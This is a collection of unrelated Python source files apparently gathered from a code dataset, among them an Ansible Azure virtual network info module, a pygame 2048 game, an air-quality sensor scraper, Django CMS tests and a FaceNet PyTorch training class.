self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
intersecting_catchment))
self.assertTrue(calcs.catchment_intersects_aoi(reprojected_aoi,
containing_catchment))
| StarcoderdataPython |
3287707 | <gh_stars>0
#!/usr/bin/python
#
# Copyright (c) 2016 <NAME>, <<EMAIL>>
# <NAME>, <<EMAIL>>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_virtualnetwork_info
short_description: Get virtual network facts
description:
- Get facts for a specific virtual network or all virtual networks within a resource group.
options:
name:
description:
- Only show results for a specific security group.
resource_group:
description:
- Limit results by resource group. Required when filtering by name.
tags:
description:
- Limit results by providing a list of tags. Format tags as 'key' or 'key:value'.
extends_documentation_fragment:
- azure.azcollection.azure
author:
- <NAME> (@chouseknecht)
- <NAME> (@nitzmahone)
'''
EXAMPLES = '''
- name: Get facts for one virtual network
community.azure.azure_rm_virtualnetwork_info:
resource_group: myResourceGroup
name: secgroup001
- name: Get facts for all virtual networks
community.azure.azure_rm_virtualnetwork_info:
resource_group: myResourceGroup
- name: Get facts by tags
community.azure.azure_rm_virtualnetwork_info:
tags:
- testing
'''
RETURN = '''
azure_virtualnetworks:
description:
- List of virtual network dicts.
returned: always
type: list
example: [{
"etag": 'W/"532ba1be-ae71-40f2-9232-3b1d9cf5e37e"',
"id": "/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroup/myResourceGroup/providers/Microsoft.Network/virtualNetworks/vnet2001",
"location": "eastus2",
"name": "vnet2001",
"properties": {
"addressSpace": {
"addressPrefixes": [
"10.10.0.0/16"
]
},
"provisioningState": "Succeeded",
"resourceGuid": "a7ba285f-f7e7-4e17-992a-de4d39f28612",
"subnets": []
},
"type": "Microsoft.Network/virtualNetworks"
}]
virtualnetworks:
description:
- List of virtual network dicts with same format as M(community.azure.azure_rm_virtualnetwork) module parameters.
returned: always
type: complex
contains:
id:
description:
- Resource ID of the virtual network.
sample: /subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/myResourceGroup/providers/Microsoft.Network/virtualNetworks/vnet2001
returned: always
type: str
address_prefixes:
description:
- List of IPv4 address ranges where each is formatted using CIDR notation.
sample: ["10.10.0.0/16"]
returned: always
type: list
dns_servers:
description:
- Custom list of DNS servers.
returned: always
type: list
sample: ["www.azure.com"]
location:
description:
- Valid Azure location.
returned: always
type: str
sample: eastus
tags:
description:
- Tags assigned to the resource. Dictionary of string:string pairs.
returned: always
type: dict
sample: { "tag1": "abc" }
provisioning_state:
description:
- Provisioning state of the resource.
returned: always
sample: Succeeded
type: str
name:
description:
- Name of the virtual network.
returned: always
type: str
sample: foo
subnets:
description:
- Subnets associated with the virtual network.
returned: always
type: list
contains:
id:
description:
- Resource ID of the subnet.
returned: always
type: str
sample: "/subscriptions/f64d4ee8-be94-457d-ba26-3fa6b6506cef/resourceGroups/v-xisuRG/providers/
Microsoft.Network/virtualNetworks/vnetb57dc95232/subnets/vnetb57dc95232"
name:
description:
- Name of the subnet.
returned: always
type: str
sample: vnetb57dc95232
provisioning_state:
description:
- Provisioning state of the subnet.
returned: always
type: str
sample: Succeeded
address_prefix:
description:
- The address prefix for the subnet.
returned: always
type: str
sample: '10.1.0.0/16'
network_security_group:
description:
- Existing security group ID with which to associate the subnet.
returned: always
type: str
sample: null
route_table:
description:
- The reference of the RouteTable resource.
returned: always
type: str
sample: null
service_endpoints:
description:
- An array of service endpoints.
returned: always
type: list
sample: [
{
"locations": [
"southeastasia",
"eastasia"
],
"service": "Microsoft.Storage"
}
]
'''
try:
from msrestazure.azure_exceptions import CloudError
except Exception:
# This is handled in azure_rm_common
pass
from ansible_collections.azure.azcollection.plugins.module_utils.azure_rm_common import AzureRMModuleBase
AZURE_OBJECT_CLASS = 'VirtualNetwork'
class AzureRMNetworkInterfaceInfo(AzureRMModuleBase):
def __init__(self):
self.module_arg_spec = dict(
name=dict(type='str'),
resource_group=dict(type='str'),
tags=dict(type='list'),
)
self.results = dict(
changed=False,
virtualnetworks=[]
)
self.name = None
self.resource_group = None
self.tags = None
super(AzureRMNetworkInterfaceInfo, self).__init__(self.module_arg_spec,
supports_tags=False,
facts_module=True)
def exec_module(self, **kwargs):
is_old_facts = self.module._name == 'azure_rm_virtualnetwork_facts'
if is_old_facts:
self.module.deprecate("The 'azure_rm_virtualnetwork_facts' module has been renamed to 'azure_rm_virtualnetwork_info'", version='2.13')
for key in self.module_arg_spec:
setattr(self, key, kwargs[key])
if self.name is not None:
results = self.get_item()
elif self.resource_group is not None:
results = self.list_resource_group()
else:
results = self.list_items()
if is_old_facts:
self.results['ansible_facts'] = {
'azure_virtualnetworks': self.serialize(results)
}
self.results['virtualnetworks'] = self.curated(results)
return self.results
def get_item(self):
self.log('Get properties for {0}'.format(self.name))
item = None
results = []
try:
item = self.network_client.virtual_networks.get(self.resource_group, self.name)
except CloudError:
pass
if item and self.has_tags(item.tags, self.tags):
results = [item]
return results
def list_resource_group(self):
self.log('List items for resource group')
try:
response = self.network_client.virtual_networks.list(self.resource_group)
except CloudError as exc:
self.fail("Failed to list for resource group {0} - {1}".format(self.resource_group, str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(item)
return results
def list_items(self):
self.log('List all for items')
try:
response = self.network_client.virtual_networks.list_all()
except CloudError as exc:
self.fail("Failed to list all items - {0}".format(str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(item)
return results
def serialize(self, raws):
self.log("Serialize all items")
return [self.serialize_obj(item, AZURE_OBJECT_CLASS) for item in raws] if raws else []
def curated(self, raws):
self.log("Format all items")
return [self.virtualnetwork_to_dict(x) for x in raws] if raws else []
def virtualnetwork_to_dict(self, vnet):
results = dict(
id=vnet.id,
name=vnet.name,
location=vnet.location,
tags=vnet.tags,
provisioning_state=vnet.provisioning_state
)
if vnet.dhcp_options and len(vnet.dhcp_options.dns_servers) > 0:
results['dns_servers'] = []
for server in vnet.dhcp_options.dns_servers:
results['dns_servers'].append(server)
if vnet.address_space and len(vnet.address_space.address_prefixes) > 0:
results['address_prefixes'] = []
for space in vnet.address_space.address_prefixes:
results['address_prefixes'].append(space)
if vnet.subnets and len(vnet.subnets) > 0:
results['subnets'] = [self.subnet_to_dict(x) for x in vnet.subnets]
return results
def subnet_to_dict(self, subnet):
result = dict(
id=subnet.id,
name=subnet.name,
provisioning_state=subnet.provisioning_state,
address_prefix=subnet.address_prefix,
network_security_group=subnet.network_security_group.id if subnet.network_security_group else None,
route_table=subnet.route_table.id if subnet.route_table else None
)
if subnet.service_endpoints:
result['service_endpoints'] = [{'service': item.service, 'locations': item.locations} for item in subnet.service_endpoints]
return result
def main():
AzureRMNetworkInterfaceInfo()
if __name__ == '__main__':
main()
| StarcoderdataPython |
182034 | <filename>get_gsheet.py
#!/usr/bin/env python3
from pprint import pprint
from pydoc import help
import pickle
import json
from google_auth_oauthlib import flow
from apiclient.discovery import build
AUTH_FILE = 'oauth2.json'
SCOPES = ["https://www.googleapis.com/auth/spreadsheets.readonly"]
SPREADSHEET_ID = '1wbnG31Z5QBm2fuyzZOY9XkSij0EERtX92wEHq9LbPiI'
URL = 'https://sheets.googleapis.com/v4/spreadsheets/' + SPREADSHEET_ID
SHEET_NAMES = ["Transactions", "Categories", "Balance History"]
def parse_google_auth(file):
"""
parse_goole_auth(file)
:param: file is a String with a path (relative or absolute) to the given JSON file.
This function requires a JSON file for a specific Google OAuth user.
This can be received from the Google Cloud Console for the linked project.
"""
try:
saved_token = open('token.bin', 'rb')
creds = pickle.load(saved_token)
except:
saved_token = open('token.bin', 'wb+')
auth_flow = flow.InstalledAppFlow.from_client_secrets_file(file, scopes=SCOPES)
creds = auth_flow.run_local_server(open_browser=True)
pickle.dump(creds, saved_token)
finally:
saved_token.close()
service = build('sheets', 'v4', credentials=creds)
return service
def open_file(service, file_id, range_string):
request = service.spreadsheets().values().batchGet(spreadsheetId=SPREADSHEET_ID, ranges=range_string)
response = request.execute()
savefile = open('{}.json'.format(range_string.lower()), 'w+')
json.dump(response, savefile, indent=4, separators=[',', ': '])
SERVICE = parse_google_auth(AUTH_FILE)
for range_string in SHEET_NAMES:
open_file(SERVICE, SPREADSHEET_ID, range_string)
| StarcoderdataPython |
165540 | <filename>main.py
import pygame as pg
import sys
import random
import math
import os
# init
pg.init()
pg.font.init()
# font
title_font = pg.font.SysFont('MalgumGothic', 96)
block_font1 = pg.font.SysFont('MalgunGothic', 72)
block_font2 = pg.font.SysFont('MalgunGothic', 55)
block_font3 = pg.font.SysFont('MalgunGothic', 32)
# clock
clock = pg.time.Clock()
# color
COLOR_YELLOW = pg.Color(255, 255, 0)
COLOR_WHITE = pg.Color(255, 255, 255)
COLOR_BLACK = pg.Color(0, 0, 0)
COLOR_BLOCK = [pg.Color(244, 203, 255), pg.Color(234, 193, 255), pg.Color(204, 153, 255), pg.Color(163, 112, 214),
pg.Color(102, 21, 153), pg.Color(51, 0, 102),
pg.Color(random.randint(0,256), random.randint(0,256), random.randint(0,256)),
pg.Color(random.randint(0,256), random.randint(0,256), random.randint(0,256)),
pg.Color(random.randint(0,256), random.randint(0,256), random.randint(0,256)),
pg.Color(random.randint(0,256), random.randint(0,256), random.randint(0,256)),
pg.Color(random.randint(0,256), random.randint(0,256), random.randint(0,256)),
pg.Color(random.randint(0,256), random.randint(0,256), random.randint(0,256))]
# block
block_location = [[102, 251, 401, 549], [202, 351, 501, 649]]
block_value = [[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]]
# SCREEN
os.environ['SDL_VIDEO_WINDOW_POS'] = "{},{}".format(400, 50)
SCREEN = pg.display.set_mode((650, 750))
def block_make():
blank = False
for i in block_value:
for j in i:
if j == 0:
blank = True
if blank != True:
print("Fail")
pg.quit()
sys.exit()
a = random.randint(0, 3)
b = random.randint(0, 3)
while block_value[a][b] != 0:
a = random.randint(0, 3)
b = random.randint(0, 3)
block_value[a][b] = random.choice([2, 2, 2, 4])
def block_draw(value, location):
if value == 0:
return
block_surface = pg.Surface((130, 130))
block_rect = block_surface.fill(COLOR_BLOCK[int(math.log(value, 2) - 1)])
#block_rect = block_surface.fill(COLOR_BLOCK[6])
block_rect.center = (block_location[0][location[0]], block_location[1][location[1]])
if value < 99:
block_text_surface = block_font1.render("%d" % value, True, COLOR_BLACK)
elif value < 9999:
block_text_surface = block_font2.render("%d" % value, True, COLOR_BLACK)
else:
block_text_surface = block_font3.render("%d" % value, True, COLOR_BLACK)
block_text_rect = block_text_surface.get_rect()
block_text_rect.center = (block_location[0][location[0]], block_location[1][location[1]])
SCREEN.blit(block_surface, block_rect)
SCREEN.blit(block_text_surface, block_text_rect)
def block_down():
for i in range(4):
a = [0]
for j in range(4):
if block_value[j][i] != 0:
a.append(block_value[j][i])
block_value[j][i] = 0
a.reverse()
j = 0
while j < len(a) - 1:
if a[j] == a[j + 1]:
a[j + 1] = 0
a[j] = a[j] * 2
j += 1
j += 1
k = 0
for j in range(len(a) - 1):
if a[j] != 0:
block_value[3 - k][i] = a[j]
k += 1
def block_up():
for i in range(4):
a = []
for j in range(4):
if block_value[j][i] != 0:
a.append(block_value[j][i])
block_value[j][i] = 0
a.append(0)
j = 0
while j < len(a) - 1:
if a[j] == a[j + 1]:
a[j + 1] = 0
a[j] = a[j] * 2
j += 1
j += 1
k = 0
for j in range(len(a) - 1):
if a[j] != 0:
block_value[k][i] = a[j]
k += 1
def block_left():
for i in block_value:
a = []
for j in range(4):
if i[j] != 0:
a.append(i[j])
i[j] = 0
a.append(0)
j = 0
while j < len(a) - 1:
if a[j] == a[j + 1]:
a[j + 1] = 0
a[j] = a[j] * 2
j += 1
j += 1
k = 0
for j in range(len(a) - 1):
if a[j] != 0:
i[k] = a[j]
k += 1
def block_right():
for i in block_value:
a = [0]
for j in range(4):
if i[j] != 0:
a.append(i[j])
i[j] = 0
a.reverse()
j = 0
while j < len(a) - 1:
if a[j] == a[j + 1]:
a[j + 1] = 0
a[j] = a[j] * 2
j += 1
j += 1
k = 0
for j in range(len(a) - 1):
if a[j] != 0:
i[3 - k] = a[j]
k += 1
# surface, rect
title_text_surface = title_font.render("2048", True, COLOR_WHITE)
title_text_rect = title_text_surface.get_rect()
title_text_rect.center = (100, 50)
# loop
start = True
while True:
if start:
block_make()
start = False
for event in pg.event.get():
if event.type == pg.QUIT:
pg.quit()
sys.exit()
if event.type == pg.KEYDOWN:
if pg.key.get_pressed()[pg.K_DOWN]:
block_down()
block_make()
if pg.key.get_pressed()[pg.K_UP]:
block_up()
block_make()
if pg.key.get_pressed()[pg.K_LEFT]:
block_left()
block_make()
if pg.key.get_pressed()[pg.K_RIGHT]:
block_right()
block_make()
SCREEN.fill(COLOR_BLACK)
for i in range(1, 4):
pg.draw.line(SCREEN, (100, 100, 100), [25 + 150 * i, 125], [25 + 150 * i, 725], 5)
pg.draw.line(SCREEN, (100, 100, 100), [25, 125 + 150 * i], [625, 125 + 150 * i], 5)
pg.draw.rect(SCREEN, COLOR_WHITE, [25, 125, 600, 600], 10)
SCREEN.blit(title_text_surface, title_text_rect)
y = 0
for i in block_value:
x = 0
for j in i:
block_draw(j, [x, y])
x += 1
y += 1
pg.display.flip()
clock.tick(30) | StarcoderdataPython |
159164 | #!/usr/bin/env python3
import json
from datetime import datetime, timedelta
import os
from functools import partial
import pathlib
import requests
import sys
import time
import threading
TOK_THINGSPEAK_PRIMARY_ID = "THINGSPEAK_PRIMARY_ID"
TOK_THINGSPEAK_PRIMARY_ID_READ_KEY = "THINGSPEAK_PRIMARY_ID_READ_KEY"
DATA_DIR = "./data-cache"
IN_BACKGROUND = True
GET_SLEEP = 0.1
MAX_THREADS=20
class Cache:
@staticmethod
def init():
pathlib.Path(DATA_DIR).mkdir(parents=True, exist_ok=True)
@staticmethod
def get(fname, func):
path = os.path.join(DATA_DIR, fname)
if os.path.exists(path):
print(f"{fname} previously cached")
with open(path, "r") as f:
return json.load(f)
print(f"{fname} not cached, calling {func}")
content = func()
if content:
with open(path, "w") as f:
print(f"Caching {fname}")
json.dump(content, f)
return content
@staticmethod
def clear(fname):
path = os.path.join(DATA_DIR, fname)
print(f"Removing {fname}")
os.unlink(path)
@staticmethod
def contains(fname):
path = os.path.join(DATA_DIR, fname)
return os.path.exists(path)
def getUrl(url):
res = requests.get(url)
time.sleep(GET_SLEEP)
return {
"status_code": res.status_code,
"headers": dict(res.headers),
"text": res.json()
}
def getSensorData(id, key=None):
print(f"Fetching sensor data for {id}")
url = f"https://www.purpleair.com/json?show={id}&key={key}"
return getUrl(url)
def getSensorTimeline(channel, api_key):
field = 2
now = datetime.now()
start = now - timedelta(days=7)
startStr = "{:%Y-%m-%d %H:%M:%S}".format(start)
endStr = ""
offset = 0
avg = 60
url = f"https://api.thingspeak.com/channels/{channel}/fields/{field}.json?start={startStr}&end={endStr}&offset={offset}&round=2&average={avg}&api_key={api_key}"
return getUrl(url)
Cache.init()
def handle_id(id):
fname_data = f"{id}.data"
print(f"{id}: Getting: {fname_data}")
data = Cache.get(fname_data, partial(getSensorData, id))
status = data["status_code"]
print(f"{id}: Status(data): {status}")
if status != 200:
print(f"{id}: ====================== Deleting {fname_data}")
Cache.clear(fname_data)
return
results = data["text"]["results"]
if len(results) == 0:
print(f"{id}: Skipping: empty")
return
if results[0].get("DEVICE_LOCATIONTYPE") == "inside":
print(f"{id}: Skipping: inside")
return
if results[0].get("ParentID"):
print(f"{id}: Skipping: has a parent")
return
fname_timeline = f"{id}.timeline"
channel = data["text"]["results"][0][TOK_THINGSPEAK_PRIMARY_ID]
api_key = data["text"]["results"][0][TOK_THINGSPEAK_PRIMARY_ID_READ_KEY]
timeline = Cache.get(fname_timeline, partial(getSensorTimeline, channel, api_key))
print(f"{id}: Status(timeline): {timeline['status_code']}")
status = timeline["status_code"]
if status != 200:
print(f"{id}: ====================== Deleting {fname_timeline}")
Cache.clear(fname_timeline)
assert MAX_THREADS >= 2
for id in range(1000, 83000):
if IN_BACKGROUND:
while threading.activeCount() >= MAX_THREADS:
time.sleep(0.01)
func = partial(handle_id, id)
threading.Thread(target=func).start()
else:
handle_id(id)
| StarcoderdataPython |
50482 | <filename>test/e2e/containers/dsd_sender/sender.py
import datadog
import time
client = datadog.dogstatsd.base.DogStatsd(socket_path="/var/run/dogstatsd/dsd.socket")
while True:
# Nominal case, dsd will inject its hostname
client.gauge('dsd.hostname.e2e', 1, tags=["case:nominal"])
client.service_check('dsd.hostname.e2e', 0, tags=["case:nominal"])
client.event('dsd.hostname.e2e', 'text', tags=["case:nominal"])
# Force the hostname value
client.gauge('dsd.hostname.e2e', 1, tags=["case:forced", "host:forced"])
client.service_check('dsd.hostname.e2e', 0, tags=["case:forced"], hostname="forced")
client.event('dsd.hostname.e2e', 'text', tags=["case:forced"], hostname="forced")
# Force an empty hostname
client.gauge('dsd.hostname.e2e', 1, tags=["case:empty", "host:"])
client.service_check('dsd.hostname.e2e', 0, tags=["case:empty", "host:"])
client.event('dsd.hostname.e2e', 'text', tags=["case:empty", "host:"])
time.sleep(10)
| StarcoderdataPython |
1731077 | <gh_stars>0
"""
练习:
在终端中,循环录入字符串,如果录入空则停止.
停止录入后打印所有内容(一个字符串)
"""
result = []
while True:
content = input("请输入内容:")
if content == "":
break
result.append(content)
result = "_".join(result)
print(result)
| StarcoderdataPython |
95316 | import tictac.cli
tictac.cli.main()
| StarcoderdataPython |
3282737 | """
Test suite for all utils in the `core` application
"""
from django.test import override_settings
from cms.api import Page
from cms.test_utils.testcases import CMSTestCase
from richie.apps.core.factories import PageFactory
from richie.apps.core.helpers import create_i18n_page
class PagesTests(CMSTestCase):
"""Integration tests that actually render pages"""
def test_pages_i18n(self):
"""
Create an i18n page and check its rendering on the site
"""
content = {"fr": "Tableau de bord", "en": "Dashboard"}
create_i18n_page(
content,
is_homepage=True,
published=True,
template="richie/single_column.html",
)
# Get the root page in french...
root = Page.objects.get_home()
response = self.client.get(root.get_absolute_url("fr"))
self.assertEqual(200, response.status_code)
# ... and make sure the page menu is present in french on the page
self.assertIn(content["fr"], response.rendered_content)
# Get the root page in english...
response = self.client.get(root.get_absolute_url("en"))
self.assertEqual(200, response.status_code)
# ... and make sure the page menu is present in english on the page
self.assertIn(content["en"], response.rendered_content)
@override_settings(SENTRY_DSN="https://example.com/sentry/dsn")
@override_settings(RELEASE="9.8.7")
@override_settings(ENVIRONMENT="test_pages")
def test_page_includes_frontend_context(self):
"""
Create a page and make sure it includes the frontend context as included
in `base.html`.
⚠️ If this test fails, before fixing it, identify if this change has had
⚠️ an impact on frontend and update frontend accordingly.
"""
page = PageFactory(should_publish=True, template="richie/single_column.html")
response = self.client.get(page.get_public_url())
self.assertContains(response, '"environment": "test_pages"')
self.assertContains(response, '"release": "9.8.7"')
self.assertContains(response, '"sentry_dsn": "https://example.com/sentry/dsn"')
| StarcoderdataPython |
1784496 | <filename>licytacje_api/database.py
import sqlite3
import json
def open_db():
conn = sqlite3.connect('auctions.db')
print("Opened database successfully")
return conn
def create_db_table(table_name: str, schema: dict, conn: sqlite3.Connection):
cursor = conn.cursor()
schema_str = ', '.join([str(k)+' '+str(v) for k, v in schema.items()])
cursor.execute("CREATE TABLE IF NOT EXISTS "+table_name+" ("+schema_str+")")
def populate_db(list_of_dicts: list, table_name: str, conn: sqlite3.Connection):
cursor = conn.cursor()
for dic in list_of_dicts:
cursor.execute("INSERT INTO "+table_name+" VALUES (?, ?)",
[dic['id'], json.dumps(dic, indent=4, sort_keys=True, default=str)])
if __name__ == "__main__":
d = {'id': '1', 'address': 'Horbaczewskiego 21/...0 Wrocław', 'date': 'datetime.datetime(20..., 4, 0, 0)', 'kw': None, 'price': "Decimal('234750.00')", 'url': 'http://www.licytacj...ls/486059'}
try:
with open_db() as con:
table_name = 'auctions'
create_db_table(table_name, {'id': 'varchar(16)', 'data': 'json'}, con)
# populate_db([d], table_name, con)
except sqlite3.IntegrityError as e:
print(e.args)
| StarcoderdataPython |
3263986 | <reponame>SamiIbishi/applied-machine-learning<filename>src/trainer/FaceNetTrainer.py
# General Packages
import json
import os
import time
import typing
import datetime
import numpy as np
# Torch Packages
import torch
import torch.nn.functional as f
# Utilities
from src.utils.utils_tensorboard import MySummaryWriter
from src.utils.utils_optimizer import CustomOptimizer, get_optimizer, get_default_optimizer
from src.utils.utils_loss_functions import CustomLossFunctions, get_loss_function, \
get_default_loss_function
import src.utils.utils_images as img_util
import numpy as np
# Template to modify
class FaceNetTrainer:
def __init__(
self,
model,
train_loader,
valid_loader,
test_loader=None,
epochs: int = 10,
logs_per_epoch: int = 10,
image_log_frequency: int = 5,
tensorboard_writer: MySummaryWriter = None,
optimizer: typing.Any = None,
optimizer_args: typing.Optional[typing.Dict[str, typing.Any]]=None,
loss_func: typing.Any = None,
loss_func_args: typing.Optional[typing.Dict[str, typing.Any]]=None,
device: str = 'cpu',
anchor_dict: dict = None
):
# Data loader
self.train_loader = train_loader
self.valid_loader = valid_loader
self.test_loader = test_loader
self.anchor_dict = anchor_dict
# Model
self.model = model
# Computation device [CPU / GPU]
if device == 'cuda' and torch.cuda.is_available():
self.device = device
self.model.cuda()
# Get trainable parameters
params_to_update = []
for param in self.model.parameters():
if param.requires_grad:
params_to_update.append(param)
# Hyperparameter - Epoch & log-frequency
self.epochs = epochs
self.log_frequency = int(len(train_loader) / logs_per_epoch)
if self.log_frequency <= 0:
self.log_frequency = 1
self.image_log_frequency = image_log_frequency
# Hyperparameter - Optimizer
self.optimizer_args = optimizer_args
if isinstance(optimizer, str) or isinstance(optimizer, CustomOptimizer):
if optimizer_args is None:
raise ValueError(f'Arguments dictionary for custom optimizer is missing.')
self.optimizer = get_optimizer(optimizer, params_to_update, **optimizer_args)
elif optimizer:
self.optimizer = optimizer
else:
self.optimizer = get_default_optimizer(params_to_update) # default optimizer
# Hyperparameter - Loss Function
self.loss_func_args = loss_func_args
if isinstance(loss_func, str) or isinstance(loss_func, CustomLossFunctions):
if loss_func_args is None:
raise ValueError(f'Arguments dictionary for custom loss function is missing.')
self.loss_func = get_loss_function(loss_func, **loss_func_args)
elif loss_func:
self.loss_func = loss_func
else:
self.loss_func = get_default_loss_function() # default loss function
# write to tensorboard
if tensorboard_writer:
self.tensorboard_writer = tensorboard_writer
def train_epoch(self, epoch) -> None:
"""
Training function for an epoch. Including loss and accuracy calculation.
:param epoch: Current epoch.
:return: None
"""
print(5 * "#" + f" EPOCH {epoch:02d} Start - Training " + 15 * "#")
# Set model in trainings mode
self.model.train()
start_time = time.time()
running_loss = 0
total_loss = 0
for batch_idx, (images, _) in enumerate(self.train_loader):
# Get input from data loader
anchor, positive, negative = images
# Push tensors to GPU if available
if self.device == 'cuda':
anchor, positive, negative = anchor.cuda(), positive.cuda(), negative.cuda()
with torch.set_grad_enabled(True):
# Clear gradients before calculating loss
self.optimizer.zero_grad()
# Extract image embedding via model output
anchor_output, positive_output, negative_output = self.model.forward(anchor,
positive,
negative)
# Calculate loss
triplet_loss = self.loss_func(anchor_output, positive_output, negative_output)
triplet_loss.backward()
# Optimize model parameter
self.optimizer.step()
# Statistics
running_loss += triplet_loss.item() * anchor_output.size(0)
total_loss += triplet_loss.item() * anchor_output.size(0)
# Logging and tensorboard
if batch_idx % self.log_frequency == self.log_frequency - 1 or batch_idx == len(
self.train_loader) - 1:
header = f"[{epoch:02d}/{self.epochs}][{batch_idx}/{len(self.train_loader)}]"
epoch_loss = (running_loss / anchor.size(0)) / (batch_idx % self.log_frequency + 1)
print(f"{header} => running trainings loss: {epoch_loss:.2f}")
if self.tensorboard_writer:
self.tensorboard_writer.log_training_loss(epoch_loss, batch_idx)
running_loss = 0
duration = time.time() - start_time
minutes = round(duration // 60, 0)
seconds = round(duration % 60, 0)
print(5 * "#" + f" EPOCH {epoch:02d} DONE - computation time: "
f"{minutes}m {seconds}s " + 5 * "#")
return total_loss
def evaluate_epoch(self, epoch):
"""
Evaluates the current model accuracy in the current epoch/batch.
:return: Validation accuracy.
"""
# switch to evaluate mode
self.model.eval()
correct_prediction = 0
total_prediction = 0
running_loss = 0
running_dist_ap = 0
running_dist_an = 0
for batch_idx, (images, ids) in enumerate(self.valid_loader):
# Get input from triplet 'images'
anchor, positive, negative = images
# Push tensors to GPU if available
if self.device == 'cuda':
anchor, positive, negative = anchor.cuda(), positive.cuda(), negative.cuda()
# Compute image embeddings
with torch.set_grad_enabled(False):
emb_anchor, emb_positive, emb_negative = self.model.forward(anchor, positive,
negative)
# Calculate loss
triplet_loss = self.loss_func(emb_anchor, emb_positive, emb_negative)
# Statistics
running_loss += triplet_loss.item() * emb_anchor.size(0)
# Distance between Anchor and Positive
dist_ap = f.pairwise_distance(emb_anchor, emb_positive, p=2)
# Distance between Anchor and Negative
dist_an = f.pairwise_distance(emb_anchor, emb_negative, p=2)
# Evaluation and logging
for idx in range(len(dist_ap)):
total_prediction += 1
running_dist_an += dist_an[idx]
running_dist_ap += dist_ap[idx]
if dist_ap[idx] < dist_an[idx]:
correct_prediction += 1
# Logging and tensorboard
if batch_idx % self.log_frequency == self.log_frequency - 1 or batch_idx == len(
self.valid_loader):
header = f"[{epoch:02d}/{self.epochs}][{batch_idx}/{len(self.valid_loader)}]"
# averaging
epoch_loss = (running_loss / anchor.size(0)) / (batch_idx + 1)
running_dist_an = running_dist_an / (
(batch_idx % self.log_frequency + 1) * anchor.size(0))
running_dist_ap = running_dist_ap / (
(batch_idx % self.log_frequency + 1) * anchor.size(0))
print(f"{header} => running validation loss: {epoch_loss:.2f}")
if self.tensorboard_writer:
self.tensorboard_writer.log_custom_scalar("dist_ap/eval", running_dist_ap,
batch_idx)
self.tensorboard_writer.log_custom_scalar("dist_an/eval", running_dist_an,
batch_idx)
running_dist_ap = 0
running_dist_an = 0
if (epoch % self.image_log_frequency == self.image_log_frequency - 1 or
epoch == self.epochs) \
and batch_idx == 0\
and self.tensorboard_writer:
# Print the first batch of images with their distances to tensorboard
fig = img_util.plot_images_with_distances(images=images, dist_an=dist_an,
dist_ap=dist_ap)
self.tensorboard_writer.add_figure("eval/distances", fig, batch_idx)
# Compute acc. Logging and tensorboard.
valid_acc = (100. * correct_prediction) / total_prediction
print(f'Validation accuracy: {valid_acc:.2f}%')
if self.tensorboard_writer:
self.tensorboard_writer.log_validation_accuracy(valid_acc)
return valid_acc
def train(self,
path_to_saved: str = None,
epochs: typing.Optional[int] = None,
log_frequency: typing.Optional[int] = None) -> None:
"""
Fit model on trainings data and evaluate on validation set.
:param path_to_saved:
:param epochs: Number of trainings epochs.
:param log_frequency: Frequency in which information is logged.
:return: None
"""
self.start_time_training = time.time()
if epochs:
self.epochs = epochs
if log_frequency:
self.log_frequency = log_frequency
for epoch in range(1, self.epochs + 1):
epoch_loss = self.train_epoch(epoch)
if self.tensorboard_writer:
self.tensorboard_writer.increment_epoch()
self.evaluate_epoch(epoch)
if (epoch % self.image_log_frequency == self.image_log_frequency - 1 or
epoch == self.epochs) \
and self.tensorboard_writer:
batch = iter(self.valid_loader).next()
self.inference_to_tensorboard(batch)
if epoch_loss < 1:
print(
f"##### Interrupt training because training loss is {epoch_loss} and very good")
break
self.end_time_training = time.time()
if path_to_saved:
self.save_training(path_to_saved)
def inference_to_tensorboard(self, batch, fuzzy_matches: bool = True):
"""
Logs the positives of one batch to tensorboard with the prediction and the inference
:param batch: the batch incl anchors, positives, negatives and the ids
:param fuzzy_matches:
:return:
"""
(images, ids) = batch
if self.tensorboard_writer: # log inference on some pics
self.model.create_anchor_embeddings(anchor_dict=self.anchor_dict)
positives = images[1]
predicted_ids = []
for idx in range(len(ids)):
true_id = ids[idx]
image = positives[idx]
if self.device == "cuda":
image = image.cuda()
(predicted_id, comment) = self.model.inference(image, fuzzy_matches=fuzzy_matches,
use_threshold=False)
predicted_ids.append(predicted_id)
fig = img_util.plot_classes_preds_face_recognition(positives, ids, predicted_ids,
fuzzy_matches)
self.tensorboard_writer.add_figure("inference", fig, 0)
def save_training(self, path_to_saved: str = "./src/saved/trained_models/"):
"""
:param path_to_saved:
:return:
"""
path = path_to_saved
# Validate path to directory 'trained_models'
if not os.path.exists(path):
os.makedirs(path)
# get date/time after model is trained
date = datetime.datetime.now()
trainings_dir = date.strftime('model_date_%Y_%m_%d_time_%H_%M')
trainings_dir_path = os.path.join(path, trainings_dir)
# Validate path to current training directory
if not os.path.exists(trainings_dir_path):
os.makedirs(trainings_dir_path)
# Save model
torch.save(self.model.state_dict(), os.path.join(trainings_dir_path, 'model'))
duration = self.end_time_training - self.start_time_training
minutes = round(duration // 60, 0)
seconds = round(duration % 60, 0)
# Save hyperparameter
hyperparameter = {
"date": date.strftime("%m/%d/%Y, %H:%M:%S"),
"git_commit_id": "<PASSWORD>", # ToDo: manually edit,
"optimizer": str(self.optimizer),
"loss_func": str(self.loss_func),
"epochs": self.epochs,
"batches in train": len(self.train_loader),
"batch size": len(iter(self.train_loader).next()[0][0]),
"total_duration: ": f"{minutes} min {seconds} sec"
}
# model parameter
model_parameter = {
"input_size": self.model.input_size,
"num_features": self.model.num_features,
"num_embedding_dimensions": self.model.num_embedding_dimensions,
"pretrained_model": self.model.pretrained_model
}
if self.optimizer_args:
for opt_arg, opt_arg_value in self.optimizer_args.items():
hyperparameter['optimizer_arg_' + opt_arg] = opt_arg_value
if self.loss_func_args:
for loss_func_arg, loss_func_arg_value in self.loss_func_args.items():
hyperparameter['optimizer_arg_' + loss_func_arg] = loss_func_arg_value
